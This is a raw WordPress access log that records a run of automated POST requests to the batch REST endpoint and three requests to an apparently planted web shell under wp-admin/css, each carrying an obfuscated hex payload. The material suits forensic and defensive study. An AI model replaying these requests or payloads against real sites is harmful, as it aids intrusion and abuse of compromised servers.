45.148.10.21 - - [26/Jul/2026:11:22:04 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:05 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:05 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:06 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.21.40.28 - - [26/Jul/2026:11:20:06 +0200] "GET /wp-admin/css/colors/blue/blue/index.php?ARRAY=7o2230223n313738353036313230362p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035373630362q6264316436653437313132653666373335666333616230643465383061613939222p2232223n226130343032313038333339313131633438353831363530643663643033656233222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q33362q35332q36352q37382q38342q3234227q HTTP/1.1" 500 567 "-" "-"
45.148.10.21 - - [26/Jul/2026:11:22:06 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:07 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:07 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:08 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:09 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:09 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:10 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:10 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:11 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:11 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
65.21.4.11 - - [26/Jul/2026:11:22:12 +0200] "GET /wp-content/uploads/289134081_426630069468915_2377592198000477975_n-e1739796640678-300x198.jpg HTTP/1.1" 200 17936 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
45.148.10.21 - - [26/Jul/2026:11:22:12 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:12 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:13 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
34.195.23.187 - - [26/Jul/2026:11:22:12 +0200] "GET / HTTP/1.1" 200 11257 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
45.148.10.21 - - [26/Jul/2026:11:22:13 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:13 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:14 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:14 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:15 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:15 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:16 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:16 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:17 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:17 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:18 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:18 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:18 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:19 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:19 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:20 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:20 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:21 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:21 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:22 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:22 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:23 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:23 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:23 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:24 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:24 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1298 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:25 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:25 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:26 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:26 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:27 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.21.40.28 - - [26/Jul/2026:11:20:27 +0200] "GET /wp-admin/css/colors/blue/blue/index.php?ARRAY=7o2230223n313738353036313232372p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035373632372q3161663834313464646631653839646465646362376363346436376334393730222p2232223n226130343032313038333339313131633438353831363530643663643033656233222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q33362q35332q36352q37382q38342q3234227q HTTP/1.1" 500 567 "-" "-"
45.148.10.21 - - [26/Jul/2026:11:22:27 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:28 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:28 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:29 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:29 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:30 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:30 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:30 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:31 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:31 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:32 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:32 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:33 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:33 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:34 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:34 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:35 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:35 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:36 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:37 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:37 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:38 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:38 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:39 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:39 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:41 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:41 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:42 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:42 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:43 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:43 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:44 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:44 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:45 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:45 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:46 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:46 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:47 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:47 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:48 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.21.40.28 - - [26/Jul/2026:11:20:48 +0200] "GET /wp-admin/css/colors/blue/blue/index.php?ARRAY=7o2230223n313738353036313234382p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035373634382q3136623838623134643732376636363466616239363963633336353334366566222p2232223n226130343032313038333339313131633438353831363530643663643033656233222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q33362q35332q36352q37382q38342q3234227q HTTP/1.1" 500 567 "-" "-"
45.148.10.21 - - [26/Jul/2026:11:22:48 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:49 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:49 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:50 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:50 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:51 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:51 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:52 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:52 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:52 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:53 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:53 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:54 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:54 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
